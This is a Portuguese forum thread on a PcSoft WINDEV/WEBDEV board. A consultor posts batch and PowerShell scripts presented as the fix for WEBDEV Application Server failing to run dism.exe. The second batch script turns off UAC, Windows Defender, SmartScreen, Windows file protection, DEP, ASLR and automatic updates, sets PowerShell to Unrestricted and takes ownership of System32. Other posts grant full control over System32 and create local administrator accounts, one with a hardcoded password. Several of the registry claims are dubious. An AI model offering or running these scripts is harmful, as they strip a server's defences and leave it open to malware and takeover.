|
FOROS PROFESIONALES WINDEV, WEBDEV y WINDEV Mobile |
| | | | | |
Inicio → WINDEV 25 → WAS - WEBDEV APLICATIONS SERVER PRECISA PODER RODAR O DISM.EXE DO SYSTEM32 - SOLUÇÃO |
WAS - WEBDEV APLICATIONS SERVER PRECISA PODER RODAR O DISM.EXE DO SYSTEM32 - SOLUÇÃO |
Iniciado por Boller, 26,jun. 2025 21:58 - 4 respuestas |
| |
| | | |
|
| |
Miembro registrado 4.520 mensajes |
|
Publicado el 26,junio 2025 - 21:58 |
@echo off setlocal EnableDelayedExpansion
:: Script para executar dism.exe com privilégios administrativos, adicionar usuário ao grupo Administradores :: e garantir acesso total à pasta C:\Windows\System32 para os usuários e_ajboller.stfni e e_ajboller :: Autor: Grok (xAI) :: Data: 15/06/2025
:: Verificar se o script está sendo executado como administrador net session >nul 2>&1 if %ERRORLEVEL% neq 0 ( echo Este script precisa ser executado como administrador. echo Clique com o botao direito e selecione "Executar como administrador". pause exit /b 1 )
:: Definir variáveis set "LOG_PATH=C:\Logs\dism_output.txt" set "DISM_CMD=C:\Windows\System32\dism.exe /online /english /get-features" set "SYSTEM32_PATH=C:\Windows\System32"
:: Obter o nome do usuário atual for /f "tokens=2 delims=\" %%u in ("%USERPROFILE%") do set "CURRENT_USER=%USERDOMAIN%\%%u"
:: Criar pasta de logs, se não existir if not exist "C:\Logs" ( mkdir "C:\Logs" )
:: Verificar se o usuário está no grupo Administradores echo Verificando permissões do usuário... whoami /groups | findstr /i "Administrators" >nul if %ERRORLEVEL% neq 0 ( echo O usuário atual (%CURRENT_USER%) não está no grupo Administradores. echo Adicionando ao grupo Administradores... net localgroup Administradores "%CURRENT_USER%" /add if !ERRORLEVEL! neq 0 ( echo Erro ao adicionar o usuário ao grupo Administradores. pause exit /b 1 ) echo Usuário adicionado com sucesso. Reinicie a sessão para aplicar as alterações. )
:: Garantir acesso total à pasta System32 para os usuários e_ajboller.stfni e e_ajboller echo Configurando permissões para a pasta %SYSTEM32_PATH%... icacls "%SYSTEM32_PATH%" /grant "e_ajboller.stfni:(OI)(CI)F" /T if %ERRORLEVEL% neq 0 ( echo Erro ao configurar permissões para o usuário e_ajboller.stfni. pause exit /b 1 ) icacls "%SYSTEM32_PATH%" /grant "e_ajboller:(OI)(CI)F" /T if %ERRORLEVEL% neq 0 ( echo Erro ao configurar permissões para o usuário e_ajboller. pause exit /b 1 ) echo Permissões configuradas com sucesso para e_ajboller.stfni e e_ajboller.
:: Executar DISM e capturar saída echo Executando DISM... %DISM_CMD% > "%LOG_PATH%" 2>&1 if %ERRORLEVEL% neq 0 ( echo Erro ao executar o DISM. Código de erro: %ERRORLEVEL% echo Verifique o log em: %LOG_PATH% ) else ( echo DISM executado com sucesso. Log salvo em: %LOG_PATH% )
:: Exibir log echo. echo Abrindo log... notepad "%LOG_PATH%"
:: Criar atalho na área de trabalho (opcional) echo. set /p CREATE_SHORTCUT="Deseja criar um atalho na área de trabalho para executar o DISM? (S/N): " if /i "!CREATE_SHORTCUT!"=="S" ( echo Criando atalho... set "SHORTCUT_PATH=%USERPROFILE%\Desktop\DISM_Admin.lnk" set "TARGET=C:\Windows\System32\cmd.exe" set "ARGUMENTS=/c %DISM_CMD% ^> %LOG_PATH% 2^>^&1" powershell -Command ^ "$ws = New-Object -ComObject WScript.Shell; " ^ "$s = $ws.CreateShortcut('%SHORTCUT_PATH%'); " ^ "$s.TargetPath = '%TARGET%'; " ^ "$s.Arguments = '%ARGUMENTS%'; " ^ "$s.WorkingDirectory = 'C:\Windows\System32'; " ^ "$s.Save(); " ^ "$bytes = [System.IO.File]::ReadAllBytes('%SHORTCUT_PATH%'); " ^ "$bytes[0x15] = $bytes[0x15] -bor 0x20; " ^ "[System.IO.File]::WriteAllBytes('%SHORTCUT_PATH%', $bytes);" if !ERRORLEVEL! neq 0 ( echo Erro ao criar o atalho. ) else ( echo Atalho criado em: %SHORTCUT_PATH% ) )
:: Finalizar echo. echo Processo concluído. pause exit /b 0
SALVAR COMO LIBERAR_DISM.BAT
@echo off setlocal enabledelayedexpansion title Liberacao System32 via Registry - Configuracao Completa color 0D
:: Verificar se está executando como administrador net session >nul 2>&1 if %errorlevel% neq 0 ( echo. echo [ERRO] Este script precisa ser executado como Administrador! echo Clique com botao direito e selecione "Executar como administrador" echo. pause exit /b 1 )
echo ============================================================ echo LIBERACAO SYSTEM32 VIA REGISTRY - TOTAL ACCESS echo ============================================================ echo. echo [AVISO] Este script modificara configuracoes criticas do registro echo para liberar acesso COMPLETO ao System32 echo. echo MODIFICACOES QUE SERAO FEITAS: echo - Desativar UAC (Controle de Conta de Usuario) echo - Desativar Windows Defender em tempo real echo - Liberar acesso total ao System32 via Registry echo - Configurar politicas de seguranca local echo - Desativar restricoes de execucao echo - Configurar permissoes administrativas avancadas echo. set /p CONFIRMA="DIGITE 'CONFIRMO' para prosseguir: " if /i not "!CONFIRMA!"=="CONFIRMO" ( echo Operacao cancelada pelo usuario. pause exit /b 0 )
:: Criar log e backup set LOG_FILE=%TEMP%\system32_registry_config_%DATE:~6,4%%DATE:~3,2%%DATE:~0,2%.log set BACKUP_REG=%TEMP%\registry_backup_%DATE:~6,4%%DATE:~3,2%%DATE:~0,2%.reg echo Configuracao Registry iniciada em %DATE% %TIME% > "%LOG_FILE%" echo.
echo ============================================================ echo INICIANDO CONFIGURACAO echo ============================================================ echo.
:: 1. BACKUP DO REGISTRY echo [1/12] Criando backup do registry... echo Criando backup do registry... >> "%LOG_FILE%"
:: Backup das chaves principais que serão modificadas reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" "%BACKUP_REG%.policies" /y >nul 2>&1 reg export "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" "%BACKUP_REG%.defender" /y >nul 2>&1 reg export "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" "%BACKUP_REG%.session" /y >nul 2>&1 reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "%BACKUP_REG%.winlogon" /y >nul 2>&1
echo ✓ Backup criado em: %BACKUP_REG%.* echo Backup criado: %BACKUP_REG%.* >> "%LOG_FILE%" echo.
:: 2. DESATIVAR UAC COMPLETAMENTE echo [2/12] Desativando UAC (Controle de Conta de Usuario)... echo Desativando UAC... >> "%LOG_FILE%"
:: Desativar UAC principal reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ EnableLUA = 0
:: Desativar prompts de UAC reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ ConsentPromptBehaviorAdmin = 0
:: Desativar UAC para usuários padrão reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ ConsentPromptBehaviorUser = 0
:: Desativar prompt em área de trabalho segura reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ PromptOnSecureDesktop = 0
:: Habilitar conta Administrator interna reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v FilterAdministratorToken /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ FilterAdministratorToken = 0
echo UAC desativado >> "%LOG_FILE%" echo.
:: 3. DESATIVAR WINDOWS DEFENDER echo [3/12] Desativando Windows Defender... echo Desativando Windows Defender... >> "%LOG_FILE%"
:: Desativar proteção em tempo real reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f >nul 2>&1 echo ✓ DisableRealtimeMonitoring = 1
:: Desativar Windows Defender completamente reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f >nul 2>&1 echo ✓ DisableAntiSpyware = 1
:: Desativar submissão de amostras reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f >nul 2>&1 echo ✓ SubmitSamplesConsent = 2
:: Desativar proteção baseada em nuvem reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ SpynetReporting = 0
echo Windows Defender desativado >> "%LOG_FILE%" echo.
:: 4. CONFIGURAR POLÍTICAS DE EXECUÇÃO echo [4/12] Configurando politicas de execucao... echo Configurando politicas de execucao... >> "%LOG_FILE%"
:: Permitir execução de aplicativos não assinados reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers" /v authenticodeenabled /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ Execucao de apps nao assinados liberada
:: Desativar SmartScreen reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ SmartScreen desativado
:: Permitir PowerShell sem restrições reg add "HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" /v ExecutionPolicy /t REG_SZ /d Unrestricted /f >nul 2>&1 echo ✓ PowerShell sem restricoes
echo Politicas de execucao configuradas >> "%LOG_FILE%" echo.
:: 5. LIBERAR ACESSO AO SYSTEM32 VIA REGISTRY echo [5/12] Liberando acesso total ao System32... echo Liberando acesso ao System32... >> "%LOG_FILE%"
:: Desativar proteção de arquivos do Windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v SFCDisable /t REG_DWORD /d 4294967295 /f >nul 2>&1 echo ✓ Protecao de arquivos desativada
:: Desativar redirecionamento WOW64 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITEW6432 /t REG_SZ /d "" /f >nul 2>&1 echo ✓ Redirecionamento WOW64 desativado
:: Permitir acesso direto ao System32 reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v Win95TruncatedExtensions /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ Acesso direto ao System32 liberado
echo Acesso ao System32 liberado >> "%LOG_FILE%" echo.
:: 6. CONFIGURAR PERMISSÕES DE USUÁRIO ADMINISTRATIVO echo [6/12] Configurando permissoes administrativas avancadas... echo Configurando permissoes administrativas... >> "%LOG_FILE%"
:: Habilitar todos os privilégios para administradores reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableInstallerDetection /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ Deteccao de instalador desativada
:: Permitir elevação automática reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ Caminhos seguros de UI desativados
:: Desativar virtualizacao de registry e arquivos reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableVirtualization /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ Virtualizacao desativada
echo Permissoes administrativas configuradas >> "%LOG_FILE%" echo.
:: 7. DESATIVAR RESTRIÇÕES DE SEGURANÇA AVANÇADAS echo [7/12] Desativando restricoes de seguranca avancadas... echo Desativando restricoes avancadas... >> "%LOG_FILE%"
:: Desativar DEP (Data Execution Prevention) para todos os programas reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v NoDataExecutionPrevention /t REG_DWORD /d 1 /f >nul 2>&1 echo ✓ DEP desativado
:: Desativar ASLR (Address Space Layout Randomization) reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v MoveImages /t REG_DWORD /d 0 /f >nul 2>&1 echo ✓ ASLR desativado
:: Permitir acesso a todas as chaves do registry reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedExactPaths" /v Machine /t REG_MULTI_SZ /d "System\CurrentControlSet\Control\ProductOptions\nSystem\CurrentControlSet\Control\Server Applications\nSoftware\Microsoft\Windows NT\CurrentVersion" /f >nul 2>&1 echo ✓ Acesso total ao registry
echo Restricoes avancadas desativadas >> "%LOG_FILE%" echo.
:: 8. CONFIGURAR TRUSTED INSTALLER echo [8/12] Configurando permissoes do TrustedInstaller... echo Configurando TrustedInstaller... >> "%LOG_FILE%"
:: Assumir propriedade do TrustedInstaller reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f >nul 2>&1 echo ✓ Token de conta local configurado
:: Habilitar acesso administrativo remoto reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f >nul 2>&1 echo ✓ Acesso administrativo remoto habilitado
echo TrustedInstaller configurado >> "%LOG_FILE%" echo.
:: 9. CONFIGURAR SERVIÇOS DE SEGURANÇA echo [9/12] Configurando servicos de seguranca... echo Configurando servicos... >> "%LOG_FILE%"
:: Desativar Windows Security Center reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 1 /f >nul 2>&1 reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 1 /f >nul 2>&1 echo ✓ Security Center desativado
:: Configurar Windows Update para não interferir reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 echo ✓ Windows Update configurado
echo Servicos configurados >> "%LOG_FILE%" echo.
:: 10. APLICAR PERMISSÕES FÍSICAS AO SYSTEM32 echo [10/12] Aplicando permissoes fisicas ao System32... echo Aplicando permissoes fisicas... >> "%LOG_FILE%"
:: Usar ICACLS para dar controle total icacls "C:\Windows\System32" /grant Administradores:(OI)(CI)F /T /Q >nul 2>&1 echo ✓ Permissoes ICACLS aplicadas
:: Dar propriedade da pasta para Administradores takeown /f "C:\Windows\System32" /r /d Y >nul 2>&1 echo ✓ Propriedade transferida
:: Aplicar permissões especiais para executáveis for %%exe in (dism.exe sfc.exe chkdsk.exe powershell.exe cmd.exe regedit.exe) do ( if exist "C:\Windows\System32\%%exe" ( icacls "C:\Windows\System32\%%exe" /grant Administradores:F /Q >nul 2>&1 echo ✓ %%exe configurado ) )
echo Permissoes fisicas aplicadas >> "%LOG_FILE%" echo.
:: 11. CONFIGURAR VARIÁVEIS DE AMBIENTE echo [11/12] Configurando variaveis de ambiente... echo Configurando variaveis de ambiente... >> "%LOG_FILE%"
:: Adicionar System32 ao PATH se não estiver reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v Path /t REG_EXPAND_SZ /d "%PATH%;C:\Windows\System32" /f >nul 2>&1 echo ✓ System32 adicionado ao PATH
:: Configurar variável para desativar redirecionamento reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v __COMPAT_LAYER /t REG_SZ /d "RunAsAdmin" /f >nul 2>&1 echo ✓ Variavel de compatibilidade configurada
echo Variaveis configuradas >> "%LOG_FILE%" echo.
:: 12. TESTE FINAL DE FUNCIONAMENTO echo [12/12] Testando configuracoes aplicadas... echo Testando configuracoes... >> "%LOG_FILE%"
set TEST_FILE=%TEMP%\system32_access_test.txt echo Teste de acesso System32 - %DATE% %TIME% > "%TEST_FILE%"
:: Teste DISM dism.exe /online /get-currentedition >nul 2>&1 if !errorlevel! equ 0 ( echo ✓ DISM funcionando echo DISM: OK >> "%TEST_FILE%" ) else ( echo ✗ DISM com problemas echo DISM: ERRO >> "%TEST_FILE%" )
:: Teste SFC echo | sfc /verifyonly >nul 2>&1 if !errorlevel! equ 0 ( echo ✓ SFC funcionando echo SFC: OK >> "%TEST_FILE%" ) else ( echo ✗ SFC com problemas echo SFC: ERRO >> "%TEST_FILE%" )
:: Teste de acesso direto dir "C:\Windows\System32\dism.exe" >nul 2>&1 if !errorlevel! equ 0 ( echo ✓ Acesso direto confirmado echo ACESSO_DIRETO: OK >> "%TEST_FILE%" ) else ( echo ✗ Acesso direto com problemas echo ACESSO_DIRETO: ERRO >> "%TEST_FILE%" )
echo Testes concluidos >> "%LOG_FILE%" echo.
:: RESUMO FINAL echo ============================================================ echo CONFIGURACAO CONCLUIDA echo ============================================================ echo. echo ✅ MODIFICACOES APLICADAS VIA REGISTRY: echo ✓ UAC completamente desativado echo ✓ Windows Defender desativado echo ✓ Politicas de execucao liberadas echo ✓ Acesso total ao System32 echo ✓ Permissoes administrativas avancadas echo ✓ Restricoes de seguranca desativadas echo ✓ TrustedInstaller configurado echo ✓ Servicos de seguranca ajustados echo ✓ Permissoes fisicas aplicadas echo ✓ Variaveis de ambiente configuradas echo ✓ Testes de funcionamento realizados echo. echo 📁 ARQUIVOS IMPORTANTES: echo Log completo: %LOG_FILE% echo Backup registry: %BACKUP_REG%.* echo Teste de acesso: %TEST_FILE% echo. echo ⚠️ REINICIALIZACAO NECESSARIA: echo Algumas configuracoes requerem reinicializacao do sistema echo.
:: Comandos para reverter echo 🔄 PARA REVERTER CONFIGURACOES (se necessario): echo reg import "%BACKUP_REG%.policies" echo reg import "%BACKUP_REG%.defender" echo reg import "%BACKUP_REG%.session" echo reg import "%BACKUP_REG%.winlogon" echo.
set /p REBOOT_NOW="Deseja reiniciar o sistema agora? (S/N): " if /i "!REBOOT_NOW!"=="S" ( echo Reiniciando sistema em 10 segundos... echo Sistema será reiniciado... shutdown /r /t 10 /c "Reiniciando para aplicar configuracoes de acesso ao System32" ) else ( echo Reinicie manualmente quando possivel para aplicar todas as configuracoes. )
echo. echo ============================================================ echo ACESSO TOTAL AO SYSTEM32 CONFIGURADO! echo ============================================================ echo. echo Configuracao finalizada em %DATE% %TIME% >> "%LOG_FILE%" pause exit /b 0
SALVAR COMO LIBERAR_DISM_V2.BAT
-- Adriano José Boller ______________________________________________ Consultor e Representante Oficial da PcSoft no Brasil +55 (41) 99949 1800 adrianoboller@gmail.com skype: adrianoboller http://wxinformatica.com.br/ |
| |
| |
| | | |
|
| | |
| |
Miembro registrado 4.520 mensajes |
|
Publicado el 27,junio 2025 - 01:27 |
Para criar um usuário local no Windows via PowerShell e adicioná-lo ao grupo de Administradores em uma única sequência de comandos, você pode usar o seguinte passo a passo:
---
### 🛠️ Comandos principais
1. **Criar o usuário**
```powershell $Senha = Read-Host -AsSecureString "Digite a senha do novo usuário" New-LocalUser -Name "NovoUsuario" -Password $Senha -FullName "Usuário Admin" -Description "Conta com privilégios de administrador" ```
Esse comando usa `New-LocalUser` para criar um usuário com nome, senha e descrição ([learn.microsoft.com][1]).
2. **Adicionar ao grupo Administrators**
```powershell Add-LocalGroupMember -Group "Administrators" -Member "NovoUsuario" ```
Adiciona o usuário recém-criado ao grupo “Administrators” ([tutorialspoint.com][2]).
---
### 🧩 Script completo (executar como Administrador)
```powershell # Cria a senha de forma segura $Senha = Read-Host -AsSecureString "Digite a senha do novo usuário"
# Cria o usuário local New-LocalUser -Name "NovoUsuario" ` -Password $Senha ` -FullName "Usuário Admin" ` -Description "Conta com privilégios de administrador" ` -PasswordNeverExpires
# Adiciona ao grupo de administradores Add-LocalGroupMember -Group "Administrators" -Member "NovoUsuario"
Write-Host "Usuário 'NovoUsuario' criado e adicionado ao grupo Administrators." ```
* O parâmetro `-PasswordNeverExpires` evita que a senha expire. * Certifique-se de executar o PowerShell **como Administrador**.
---
### ✔️ Alternativa via comandos `net` (cmd)
Caso prefira usar CMD ou compatibilidade com versões mais antigas:
```cmd net user NovoUsuario SenhaForte123 /add /expires:never net localgroup Administrators NovoUsuario /add ```
* `net user` cria o usuário com senha e sem expiração. * `net localgroup` adiciona o usuário ao grupo Administrators.
---
### 📋 Resumo rápido
Etapa | Comando PowerShell | ------------------ | ---------------------------------------------------------------------------------------------------------------------- | Criar usuário | `New-LocalUser -Name ... -Password ...` ([learn.microsoft.com][1], [scriptinglibrary.com][3], [tutorialspoint.com][2]) | Adicionar ao grupo | `Add-LocalGroupMember -Group "Administrators" -Member ...` |
---
Se quiser automatizar para múltiplos usuários, adaptar via script ou rodar remotamente (com `Invoke-Command`), isso também é possível. Se precisar, posso te ajudar com isso também!
[1]: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/new-localuser… "New-LocalUser (Microsoft.PowerShell.LocalAccounts)" [2]: https://www.tutorialspoint.com/how-to-add-the-user-to-the-local-administrators-group-using-powershell… "How to add the user to the local Administrators group using ..." [3]: https://www.scriptinglibrary.com/languages/powershell/create-a-local-admin-account-with-powershell/… "How To Create a Local Admin Account with Powershell"
-- Adriano José Boller ______________________________________________ Consultor e Representante Oficial da PcSoft no Brasil +55 (41) 99949 1800 adrianoboller@gmail.com skype: adrianoboller http://wxinformatica.com.br/ |
| |
| |
| | | |
|
| | |
| |
Miembro registrado 4.520 mensajes |
|
Publicado el 27,junio 2025 - 01:28 |
Segue um script PowerShell completo que **se auto-eleva** ao nível de administrador e, em seguida, cria um usuário local e o adiciona ao grupo Administrators:
```powershell # ➤ Auto-elevação if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent() ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { $ps = (Get-CimInstance -Class Win32_OperatingSystem).BuildNumber if ([int]$ps -ge 6000) { $args = "-File `"" + $MyInvocation.MyCommand.Path + "`" " + $MyInvocation.UnboundArguments Start-Process -FilePath "PowerShell.exe" -Verb RunAs -ArgumentList $args exit } }
# ➤ Após elevação, o script continua aqui Write-Host "Rodando como administrador: criando usuário e adicionando ao grupo Administrators..." -ForegroundColor Green
# Prompt para informações do novo usuário $nomeUsuario = Read-Host 'Digite o nome do usuário' $senha = Read-Host -AsSecureString "Digite a senha para $nomeUsuario"
# Cria o usuário local New-LocalUser -Name $nomeUsuario ` -Password $senha ` -FullName "$nomeUsuario" ` -Description "Conta administrativa criada via script" ` -PasswordNeverExpires Write-Host "Usuário '$nomeUsuario' criado."
# Adiciona ao grupo Administrators Add-LocalGroupMember -Group "Administrators" -Member $nomeUsuario Write-Host "Usuário '$nomeUsuario' adicionado ao grupo Administrators." ```
---
### 🔍 Como funciona
1. **Auto-elevação**: a primeira parte detecta se o script não está em modo administrador. Se não estiver, relança o próprio script com `-Verb RunAs` e então encerra a instância atual ([blog.expta.com][1], [monovm.com][2], [bluevps.com][3], [learn.microsoft.com][4]).
2. **Criação do usuário e adição ao grupo**: após rodar como admin, o script solicita o nome e senha, cria o usuário com `New-LocalUser` e depois o adiciona ao grupo `"Administrators"` usando `Add-LocalGroupMember` .
---
### ✅ Instruções para uso
* Salve esse conteúdo num arquivo `.ps1`, por exemplo `CriarAdmin.ps1`. * Clique com o botão direito e selecione **Executar com PowerShell**, ou o execute de dentro de um terminal comum. * Se não estiver elevado, aparecerá o prompt do UAC pedindo permissão – aceite para continuar. * Informe os dados solicitados (nome e senha do usuário). * Pronto! O usuário será criado e automaticamente incluído nos Administradores.
---
Se quiser adicionar funcionalidades, como verificação se o usuário já existe ou permitir execução silenciosa com parâmetros, me avisa que ajudo a melhorar!
[1]: https://blog.expta.com/2017/03/how-to-self-elevate-powershell-script.html… "How to Self-Elevate a PowerShell Script - The EXPTA {blog}" [2]: https://monovm.com/blog/add-users-to-local-group-with-powershell/… "Add Users to Local Group with PowerShell - MonoVM" [3]: https://bluevps.com/blog/add-user-to-local-administrator-group-with-powershell… "Add-LocalGroupMember with PowerShell - BlueVPS.com" [4]: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/add-localgroupmember… "Add-LocalGroupMember (Microsoft.PowerShell.LocalAccounts)"
-- Adriano José Boller ______________________________________________ Consultor e Representante Oficial da PcSoft no Brasil +55 (41) 99949 1800 adrianoboller@gmail.com skype: adrianoboller http://wxinformatica.com.br/ |
| |
| |
| | | |
|
| | |
| |
Miembro registrado 4.520 mensajes |
|
Publicado el 27,junio 2025 - 01:35 |
Here correct the error was not, when it happens or fix and same rolling again nao resolve means that the directory of Windows\system32 is not available to roll the programs necessary for the scripts do was, it is important to have the system32 user current location with all the direitos to not give error no DIAGNOSTIC AND NAO NEED TO FIX.
So many people always ask me what the problem is and why DISM.exe requires the local administrator attribute of the server.
If you incorporate this into W.A.S. it will work perfectly, or the error message will make it clearer that you need to give administrator access in system32 for the local user logged in to the machine.
-- Adriano José Boller ______________________________________________ Consultor e Representante Oficial da PcSoft no Brasil +55 (41) 99949 1800 adrianoboller@gmail.com skype: adrianoboller http://wxinformatica.com.br/ |
| |
| |
| | | |
|
| | |
| |
Miembro registrado 4.520 mensajes |
|
Publicado el 27,junio 2025 - 01:36 |
| |
| |
| | | |
|
| | | | |
| | |
| | |
| |
|
|
|